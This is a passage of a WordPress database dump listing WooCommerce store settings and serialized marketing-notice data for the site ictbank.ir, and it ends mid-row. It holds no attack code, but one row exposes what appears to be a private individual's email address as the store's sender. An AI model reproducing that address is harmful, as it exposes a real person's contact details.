(52799,'woocommerce_downloads_add_hash_to_filename','yes','yes'),
(52800,'woocommerce_prices_include_tax','no','yes'),
(52801,'woocommerce_tax_based_on','shipping','yes'),
(52802,'woocommerce_shipping_tax_class','inherit','yes'),
(52803,'woocommerce_tax_round_at_subtotal','no','yes'),
(52804,'woocommerce_tax_classes','','yes'),
(52805,'woocommerce_tax_display_shop','excl','yes'),
(52806,'woocommerce_tax_display_cart','excl','yes'),
(52807,'woocommerce_price_display_suffix','','yes'),
(52808,'woocommerce_tax_total_display','itemized','no'),
(52809,'woocommerce_enable_shipping_calc','yes','no'),
(52810,'woocommerce_shipping_cost_requires_address','no','yes'),
(52811,'woocommerce_ship_to_destination','billing','no'),
(52812,'woocommerce_shipping_debug_mode','no','yes'),
(52813,'woocommerce_enable_guest_checkout','yes','no'),
(52814,'woocommerce_enable_checkout_login_reminder','no','no'),
(52815,'woocommerce_enable_signup_and_login_from_checkout','no','no'),
(52816,'woocommerce_enable_myaccount_registration','no','no'),
(52817,'woocommerce_registration_generate_username','yes','no'),
(52818,'woocommerce_registration_generate_password','yes','no'),
(52819,'woocommerce_erasure_request_removes_order_data','no','no'),
(52820,'woocommerce_erasure_request_removes_download_data','no','no'),
(52821,'woocommerce_allow_bulk_remove_personal_data','no','no'),
(52822,'woocommerce_registration_privacy_policy_text','Your personal data will be used to support your experience throughout this website, to manage access to your account, and for other purposes described in our [privacy_policy].','yes'),
(52823,'woocommerce_checkout_privacy_policy_text','Your personal data will be used to process your order, support your experience throughout this website, and for other purposes described in our [privacy_policy].','yes'),
(52824,'woocommerce_delete_inactive_accounts','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),
(52825,'woocommerce_trash_pending_orders','','no'),
(52826,'woocommerce_trash_failed_orders','','no'),
(52827,'woocommerce_trash_cancelled_orders','','no'),
(52828,'woocommerce_anonymize_completed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),
(52829,'woocommerce_email_from_name','ictbank.ir','no'),
(52830,'woocommerce_email_from_address','masoud.nikoofar@gmail.com','no'),
(52831,'woocommerce_email_header_image','','no'),
(52832,'woocommerce_email_footer_text','{site_title} — Built with {WooCommerce}','no'),
(52833,'woocommerce_email_base_color','#96588a','no'),
(52834,'woocommerce_email_background_color','#f7f7f7','no'),
(52835,'woocommerce_email_body_background_color','#ffffff','no'),
(52836,'woocommerce_email_text_color','#3c3c3c','no'),
(52837,'woocommerce_cart_page_id','320','no'),
(52838,'woocommerce_checkout_page_id','321','no'),
(52839,'woocommerce_myaccount_page_id','322','no'),
(52840,'woocommerce_terms_page_id','','no'),
(52841,'woocommerce_force_ssl_checkout','no','yes'),
(52842,'woocommerce_unforce_ssl_checkout','no','yes'),
(52843,'woocommerce_checkout_pay_endpoint','order-pay','yes'),
(52844,'woocommerce_checkout_order_received_endpoint','order-received','yes'),
(52845,'woocommerce_myaccount_add_payment_method_endpoint','add-payment-method','yes'),
(52846,'woocommerce_myaccount_delete_payment_method_endpoint','delete-payment-method','yes'),
(52847,'woocommerce_myaccount_set_default_payment_method_endpoint','set-default-payment-method','yes'),
(52848,'woocommerce_myaccount_orders_endpoint','orders','yes'),
(52849,'woocommerce_myaccount_view_order_endpoint','view-order','yes'),
(52850,'woocommerce_myaccount_downloads_endpoint','downloads','yes'),
(52851,'woocommerce_myaccount_edit_account_endpoint','edit-account','yes'),
(52852,'woocommerce_myaccount_edit_address_endpoint','edit-address','yes'),
(52853,'woocommerce_myaccount_payment_methods_endpoint','payment-methods','yes'),
(52854,'woocommerce_myaccount_lost_password_endpoint','lost-password','yes'),
(52855,'woocommerce_logout_endpoint','customer-logout','yes'),
(52856,'woocommerce_api_enabled','no','yes'),
(52857,'woocommerce_allow_tracking','no','no'),
(52858,'woocommerce_show_marketplace_suggestions','yes','no'),
(52859,'woocommerce_single_image_width','600','yes'),
(52860,'woocommerce_thumbnail_image_width','300','yes'),
(52861,'woocommerce_checkout_highlight_required_fields','yes','yes'),
(52862,'woocommerce_demo_store','no','no'),
(52864,'woocommerce_permalinks','a:5:{s:12:\"product_base\";s:8:\"/product\";s:13:\"category_base\";s:16:\"product-category\";s:8:\"tag_base\";s:11:\"product-tag\";s:14:\"attribute_base\";s:0:\"\";s:22:\"use_verbose_page_rules\";b:0;}','yes'),
(52865,'current_theme_supports_woocommerce','yes','yes'),
(52866,'woocommerce_queue_flush_rewrite_rules','no','yes'),
(52868,'product_cat_children','a:0:{}','yes'),
(52869,'default_product_cat','154','yes'),
(52872,'woocommerce_version','7.1.0','yes'),
(52873,'woocommerce_db_version','6.2.2','yes'),
(52876,'action_scheduler_lock_async-request-runner','6a008068e620c1.13109326|1778417828','yes'),
(52877,'woocommerce_admin_notices','a:2:{i:0;s:6:\"update\";i:1;s:20:\"no_secure_connection\";}','yes'),
(52878,'woocommerce_maxmind_geolocation_settings','a:1:{s:15:\"database_prefix\";s:32:\"qWXcJpywy54XVTaW803CGZqhkEAsIWh2\";}','yes'),
(52879,'_transient_woocommerce_webhook_ids_status_active','a:0:{}','yes'),
(52880,'widget_woocommerce_widget_cart','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52881,'widget_woocommerce_layered_nav_filters','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52882,'widget_woocommerce_layered_nav','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52883,'widget_woocommerce_price_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52884,'widget_woocommerce_product_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52885,'widget_woocommerce_product_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52886,'widget_woocommerce_product_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52887,'widget_woocommerce_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52888,'widget_woocommerce_recently_viewed_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52889,'widget_woocommerce_top_rated_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52890,'widget_woocommerce_recent_reviews','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52891,'widget_woocommerce_rating_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(52895,'woocommerce_admin_install_timestamp','1608981245','yes'),
(52899,'wc_admin_note_home_screen_feedback_homescreen_accessed','1608981246','yes'),
(52901,'wc_blocks_db_schema_version','260','yes'),
(52902,'wc_remote_inbox_notifications_stored_state','O:8:\"stdClass\":2:{s:22:\"there_were_no_products\";b:1;s:22:\"there_are_now_products\";b:1;}','yes'),
(52903,'woocommerce_meta_box_errors','a:0:{}','yes'),
(52904,'wc_remote_inbox_notifications_specs','a:33:{s:16:\"wayflyer_q3_2021\";O:8:\"stdClass\":8:{s:4:\"slug\";s:16:\"wayflyer_q3_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:55:\"Grow your revenue with Wayflyer financing and analytics\";s:7:\"content\";s:322:\"Flexible financing tailored to your needs by <a href=\"https://woocommerce.com/products/wayflyer/\">Wayflyer</a> – one fee, no interest rates, penalties, equity, or personal guarantees. Based on your store\'s performance, Wayflyer can provide the financing you need to grow and the analytical insights to help you spend it.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:16:\"wayflyer_q3_2021\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Get funded\";}}s:3:\"url\";s:42:\"https://woocommerce.com/products/wayflyer/\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:5:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-07-19 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-07-31 00:00:00\";}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:13:\"product_count\";s:9:\"operation\";s:2:\"<=\";s:5:\"value\";s:3:\"200\";}i:3;O:8:\"stdClass\":3:{s:4:\"type\";s:11:\"order_count\";s:9:\"operation\";s:1:\">\";s:5:\"value\";s:3:\"100\";}i:4;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:7:{i:0;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:2:\"AU\";}i:1;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:2:\"BE\";}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:2:\"CA\";}i:3;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:2:\"IE\";}i:4;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:2:\"NL\";}i:5;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:2:\"UK\";}i:6;O:8:\"stdClass\":3:{s:4:\"type\";s:21:\"base_location_country\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:2:\"US\";}}}}}s:19:\"eu_vat_changes_2021\";O:8:\"stdClass\":8:{s:4:\"slug\";s:19:\"eu_vat_changes_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:54:\"Get your business ready for the new EU tax regulations\";s:7:\"content\";s:617:\"On July 1, 2021, new taxation rules will come into play when the <a href=\"https://ec.europa.eu/taxation_customs/business/vat/modernising-vat-cross-border-ecommerce_en\">European Union (EU) Value-Added Tax (VAT) eCommerce package</a> takes effect.<br/><br/>The new regulations will impact virtually every B2C business involved in cross-border eCommerce trade with the EU.<br/><br/>We therefore recommend <a href=\"https://woocommerce.com/posts/new-eu-vat-regulations\">familiarizing yourself with the new updates</a>, and consult with a tax professional to ensure your business is following regulations and best practice.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:19:\"eu_vat_changes_2021\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:39:\"Learn more about the EU tax regulations\";}}s:3:\"url\";s:52:\"https://woocommerce.com/posts/new-eu-vat-regulations\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-06-24 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-07-11 00:00:00\";}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:3:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:29:\"woocommerce_allowed_countries\";s:5:\"value\";s:3:\"all\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:1;a:2:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:29:\"woocommerce_allowed_countries\";s:5:\"value\";s:10:\"all_except\";s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:27:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"BE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"BG\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"CZ\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"DK\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:4;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"DE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:5;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"EE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:6;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"IE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:7;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"EL\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:8;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"ES\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:9;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"FR\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:10;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"HR\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:11;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"IT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:12;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"CY\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:13;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"LV\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:14;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"LT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:15;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"LU\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:16;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"HU\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:17;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"MT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:18;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"NL\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:19;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"AT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:20;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"PL\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:21;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"PT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:22;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"RO\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:23;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"SI\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:24;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"SK\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:25;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"FI\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}i:26;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:32:\"woocommerce_all_except_countries\";s:5:\"value\";s:2:\"SE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:9:\"!contains\";}}}}i:2;a:3:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:29:\"woocommerce_allowed_countries\";s:5:\"value\";s:3:\"all\";s:7:\"default\";b:0;s:9:\"operation\";s:2:\"!=\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:29:\"woocommerce_allowed_countries\";s:5:\"value\";s:10:\"all_except\";s:7:\"default\";b:0;s:9:\"operation\";s:2:\"!=\";}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:27:{i:0;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"BE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"BG\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"CZ\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"DK\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:4;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"DE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:5;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"EE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:6;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"IE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:7;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"EL\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:8;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"ES\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:9;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"FR\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:10;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"HR\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:11;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"IT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:12;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"CY\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:13;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"LV\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:14;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"LT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:15;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"LU\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:16;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"HU\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:17;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"MT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:18;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"NL\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:19;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"AT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:20;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"PL\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:21;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"PT\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:22;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"RO\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:23;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"SI\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:24;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"SK\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:25;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"FI\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}i:26;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:38:\"woocommerce_specific_allowed_countries\";s:5:\"value\";s:2:\"SE\";s:7:\"default\";a:0:{}s:9:\"operation\";s:8:\"contains\";}}}}}}}}s:20:\"paypal_ppcp_gtm_2021\";O:8:\"stdClass\":8:{s:4:\"slug\";s:20:\"paypal_ppcp_gtm_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:38:\"Offer more options with the new PayPal\";s:7:\"content\";s:113:\"Get the latest PayPal extension for a full suite of payment methods with extensive currency and country coverage.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:36:\"open_wc_paypal_payments_product_page\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:61:\"https://woocommerce.com/products/woocommerce-paypal-payments/\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-04-05 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-04-21 00:00:00\";}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:7:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:43:\"woocommerce-gateway-paypal-express-checkout\";}}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:30:\"woocommerce-gateway-paypal-pro\";}}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:37:\"woocommerce-gateway-paypal-pro-hosted\";}}i:3;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:35:\"woocommerce-gateway-paypal-advanced\";}}i:4;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:40:\"woocommerce-gateway-paypal-digital-goods\";}}i:5;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:31:\"woocommerce-paypal-here-gateway\";}}i:6;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:44:\"woocommerce-gateway-paypal-adaptive-payments\";}}}}i:3;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:3:\"not\";s:7:\"operand\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:27:\"woocommerce-paypal-payments\";}}}}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:27:\"woocommerce-paypal-payments\";s:7:\"version\";s:5:\"1.2.1\";s:8:\"operator\";s:1:\"<\";}}}}}s:23:\"facebook_pixel_api_2021\";O:8:\"stdClass\